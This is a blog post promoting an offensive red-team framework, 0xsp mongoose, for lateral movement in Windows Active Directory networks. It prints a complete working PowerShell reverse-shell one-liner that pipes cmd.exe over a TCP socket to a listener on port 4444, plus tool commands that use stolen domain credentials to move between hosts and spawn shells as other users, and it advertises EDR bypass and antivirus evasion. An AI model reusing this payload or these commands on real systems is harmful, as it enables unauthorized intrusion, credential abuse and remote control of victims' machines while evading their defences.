unique attacks with 0xsp mongoose red

In this blog, I am going to explain some of the unique features of 0xsp mongoose, which I am sure most of the red teamers still didn’t try to explore the powerful tactics of this framework. so take a chance to spend 2 minutes to read these two unique features

Lateral movements

Lateral movement refers to the techniques that a cyber attacker uses, after gaining initial access, to move deeper into a network in search of sensitive data and other high-value assets. After entering the network, the attacker maintains ongoing access by moving through the compromised environment and obtaining increased privileges using various tools. ( crowd strike).

while developing mongoose red, I was thinking about how to make this feature fancier by expanding the functionality of lateral movement to be more satisfying. With more research, I have noticed that 50 – 60 % of cyber people spend between 5-10 minutes to achieve a lateral movement with their reverse shell or execution for specific commands, which allow them to gain access to a targeted system.

In this framework, you don’t need to spend that time with bidirectional channel support. The red teamer will grab his on-liner backdoor from the C2 server without a need to supplement of long commands into WMI CLI.

Does red mongoose help ?!

  • bypass EDR to conduct lateral movement
  • the weaponization of payload execution
  • Undetectable by AV
  • Fast ⚡

Preparing the attack

first, we have to save our desired payload in the mongoose node js application by navigating into the commands tab and past on-liner payload. In my case, I am going to use the following PowerShell reverse shell.

powershell.exe function cln{if($c.Connected -eq $true){$c.Close()};if($p.ExitCode -ne $null){$p.Close()};exit};$c=New-Object System.Net.Sockets.TcpClient;$c.Connect('',4444);if($c.Connected -ne $true){cln};$s=$c.GetStream();$b=New-Object System.Byte[] $c.ReceiveBufferSize;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;Start-Sleep 1;$e=New-Object System.Text.AsciiEncoding;while($os.Peek()-ne -1){$o+=$e.GetString($os.Read())};$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;while($true){if($c.Connected -ne $true){cln};$pos=0;$i=1;while(($i -gt 0)-and($pos -lt $b.Length)){$read=$s.Read($b,$pos,$b.Length -$pos);$pos+=$read;if($pos -and($nb[0..$($pos-1)]-contains 10)){break};if($pos -gt 0){$str=$e.GetString($b,0,$pos);$is.Write($str);Start-Sleep 1;if($p.ExitCode -ne $null){cln}else{$o=$e.GetString($os.Read());while($os.Peek()-ne -1){$o+=$e.GetString($os.Read());if($o -eq $str){$o=''}};$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$str=$null}}else{cln}}};

After setting up the payload and listener, we can now start the attack quickly, by using the following argument.

agent.exe -lr -host targethost -username domainuser -password "HERE" -srvhost nodejs

Attacking Domain/Local users

one of the scenarios that may you face while conducting a red teaming simulation on windows active directory environments is how can use the level or other domain user token. Basically, in typical cases, you have to close your current RDP session if you are with RDP and then connect without the user trying his access level. That’s not a good technique. There is another technique that we know, but using 0xsp mongoose, you don’t need that much effort.

we can quickly spawn another undetectable reverse shell by other domain users’ account with simple command as :

agent.exe -r username password cmd.exe domain

words to say

0xsp mongoose is an open-sourced project; your contribution and shown support are one of the reasons that encouraged me to push more updates and implement more development in the future.


Please follow and like us:

Leave a Comment